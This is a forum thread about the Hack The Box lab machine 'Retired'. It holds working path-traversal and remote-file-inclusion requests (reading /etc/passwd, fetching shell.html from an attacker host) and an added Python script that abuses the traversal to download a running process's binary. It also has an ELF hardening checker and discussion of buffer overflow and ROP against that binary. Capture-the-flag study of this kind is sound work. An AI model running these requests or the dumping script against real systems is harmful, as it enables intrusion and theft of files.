HTB - Retired (Box)
Working LFI
GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1

RFI works too but no execution
GET /index.php?page=http://10.10.x.y/shell.html

no /proc/self/environ access
no /proc/self/fd access
no php wrappers

log poisoning doesn't appear to work (nginx + php); there is FastCGI too, but it seems protected there as well.

anyone?
Reply
Possibly some form of file upload and file write to disk via beta.html + activate_license.php. Then try to have index.php execute it via the PHP readpage? Or SSRF to the internal service running on 127.0.0.1:1337 perhaps?

index.php
[code][/code]
beta.html - form submission
[code][/code]
activate_license.php
[code][/code]
Reply
anyone got foothold?
Reply
damn, looks like buffer overflow. In /proc/sched_debug there's a process activate_license; you can curl the ELF binary via the LFI -> /proc//exe
Reply
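The step in the post above (read /proc/sched_debug through the LFI, find the activate_license task, then pull its ELF through /proc/&lt;pid&gt;/exe) as an added example; this is not code from the thread or from the box. The sched_debug text below is constructed to mimic the kernel's task table, the traversal prefix is the one from the first post, and the base URL is an assumption. One caveat the parser handles: the kernel prints comm with %15s, so a 16-character name such as activate_license shows up truncated to activate_licens and must be matched on its truncated form.

```python
import re
import sys
import urllib.request

TASK_COMM_LEN = 16  # kernel truncates comm to TASK_COMM_LEN - 1 visible chars

# Constructed sample of /proc/sched_debug output (not captured from the box).
SAMPLE = """\
cpu#0, 2400.000 MHz
  .nr_running                    : 1
runnable tasks:
 S            task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-------------------------------------------------------------------------------------------------------------
 S         systemd     1      2476.880093      1234   120         0.000000      1000.000000         0.000000 0 0 /
 S        kthreadd     2         0.000000        30   120         0.000000         1.000000         0.000000 0 0 /
 S           nginx   611     12345.000000       200   120         0.000000        10.000000         0.000000 0 0 /autogroup-9
 S   activate_licens   617     12355.000000        12   120         0.000000         1.000000         0.000000 0 0 /autogroup-10
 S         php-fpm   624     12400.000000        45   120         0.000000         5.000000         0.000000 0 0 /autogroup-11
"""

# state char (optional), comm, PID, tree-key (float), switches, prio
TASK_LINE = re.compile(
    r"^\s*(?:[A-Z]\s+)?(\S{1,15})\s+(\d+)\s+-?\d+\.\d+\s+\d+\s+\d+\b"
)


def parse_sched_debug(text):
    """Return [(comm, pid), ...] for every task row in a sched_debug dump."""
    tasks = []
    for line in text.splitlines():
        m = TASK_LINE.match(line)
        if m:
            tasks.append((m.group(1), int(m.group(2))))
    return tasks


def find_pids(text, name):
    """PIDs whose comm equals `name` after the kernel's 15-char truncation."""
    wanted = name[: TASK_COMM_LEN - 1]
    return [pid for comm, pid in parse_sched_debug(text) if comm == wanted]


def lfi_url(base, path):
    """Build the traversal URL used in the thread for an absolute path."""
    return f"{base}?page=../../../../../../../../../../{path.lstrip('/')}"


def fetch(base, path):
    """GET a file through the LFI and return its raw bytes."""
    with urllib.request.urlopen(lfi_url(base, path), timeout=10) as resp:
        return resp.read()


def dump_process_binary(base, name, out_file):
    """Locate `name` via sched_debug and save its ELF from /proc/<pid>/exe."""
    sched = fetch(base, "/proc/sched_debug").decode(errors="replace")
    pids = find_pids(sched, name)
    if not pids:
        raise SystemExit(f"no task named {name!r} in sched_debug")
    data = fetch(base, f"/proc/{pids[0]}/exe")
    if data[:4] != b"\x7fELF":
        raise SystemExit("response is not an ELF; check the LFI path")
    with open(out_file, "wb") as fh:
        fh.write(data)
    return pids[0], len(data)


if __name__ == "__main__":
    # Offline demo on the constructed sample; pass a base URL to run it live.
    print(find_pids(SAMPLE, "activate_license"))
    if len(sys.argv) > 1:
        base = sys.argv[1]  # assumed, e.g. http://10.10.x.y/index.php
        print(dump_process_binary(base, "activate_license", "activate_license.elf"))
```

Matching on the truncated comm is what makes the lookup reliable; comparing against the full name "activate_license" would return nothing.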
it's a buffer overflow then for root you just have to exploit binfmt_misc
Reply
but how?
Reply
So NX and PIE are enabled on the ELF binary, meaning we can't do a standard buffer overflow... is that right?

Buffer is 512+ bytes to overflow, and once overflowed it is no longer stored in SQLite as a blob but as the full string, so you can see it there, as well as via GDB.

but what next?
Reply
spain without the S
Reply
ok so because RELRO is enabled on the binary, that means we can't use a PLT + GOT ret2libc - is that right?

so what's the ROP approach we have to take then, or am I overthinking it?
Reply
(April 5, 2022, 04:21 AM)skyweasel Wrote: ok so because RELRO is enabled on the binary, that means we can't use a PLT + GOT ret2libc - is that right?

so what's the ROP approach we have to take then, or am I overthinking it?


I couldn't figure out yet but I'm very curious. I wish someone here could share some foothold steps or hints
Reply
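The RELRO question in the two posts above turns on a detail a plain "RELRO enabled" line hides: partial RELRO only reorders sections and keeps the GOT writable with lazy binding on, while full RELRO (PT_GNU_RELRO plus BIND_NOW) makes the GOT read-only after the loader resolves everything. Calling libc functions through the PLT does not need a GOT write in either case; under PIE it needs an address leak. The checker below, added here and not taken from the thread or from any checksec tool, reads just the ELF64 program headers and dynamic tags needed to report PIE, NX and which RELRO flavour a pulled binary has. The `build_elf` helper constructs synthetic header-only images so the script runs offline; pass a real file path to check a downloaded binary.

```python
import struct
import sys

ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X = 1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 8, 1


def dynamic_has_bind_now(data, offset, size):
    """Scan PT_DYNAMIC entries for any of the three BIND_NOW spellings."""
    for pos in range(offset, offset + size, 16):
        tag, val = struct.unpack_from("<qQ", data, pos)
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW:
            return True
        if tag == DT_FLAGS and val & DF_BIND_NOW:
            return True
        if tag == DT_FLAGS_1 and val & DF_1_NOW:
            return True
    return False


def checksec(data):
    """Report pie / nx / relro for a little-endian ELF64 image in memory."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = False            # no PT_GNU_STACK header at all => executable stack
    relro_segment = False
    bind_now = False
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _, _, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro_segment = True
        elif p_type == PT_DYNAMIC:
            bind_now = dynamic_has_bind_now(data, p_offset, p_filesz)
    if relro_segment and bind_now:
        relro = "full"
    elif relro_segment:
        relro = "partial"
    else:
        relro = "none"
    # ET_DYN also covers shared objects; for a main executable it means PIE.
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_elf(pie, nx, relro):
    """Constructed header-only ELF64 image for offline demonstration."""
    n_ph = 3 if relro != "none" else 2
    dyn_off = 64 + 56 * n_ph
    dyn = b""
    if relro == "full":
        dyn += struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW)
    dyn += struct.pack("<qQ", DT_NULL, 0)

    def ph(p_type, p_flags, p_offset=0, p_filesz=0):
        return struct.pack("<IIQQQQQQ", p_type, p_flags, p_offset, 0, 0,
                           p_filesz, p_filesz, 8)

    phdrs = [ph(PT_GNU_STACK, 6 if nx else 7),
             ph(PT_DYNAMIC, 6, dyn_off, len(dyn))]
    if relro != "none":
        phdrs.append(ph(PT_GNU_RELRO, 4))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    header = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC,
                                 0x3E, 1, 0, 64, 0, 0, 64, 56, n_ph, 0, 0, 0)
    return header + b"".join(phdrs) + dyn


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], checksec(fh.read()))
    else:
        for cfg in [(True, True, "partial"), (True, True, "full"), (False, False, "none")]:
            print(cfg, checksec(build_elf(*cfg)))
```

If the pulled binary comes back as partial RELRO, the GOT is still a writable target; if it is full, only code paths that never write the GOT (plain PLT calls, or ROP into libc once its base is leaked) remain.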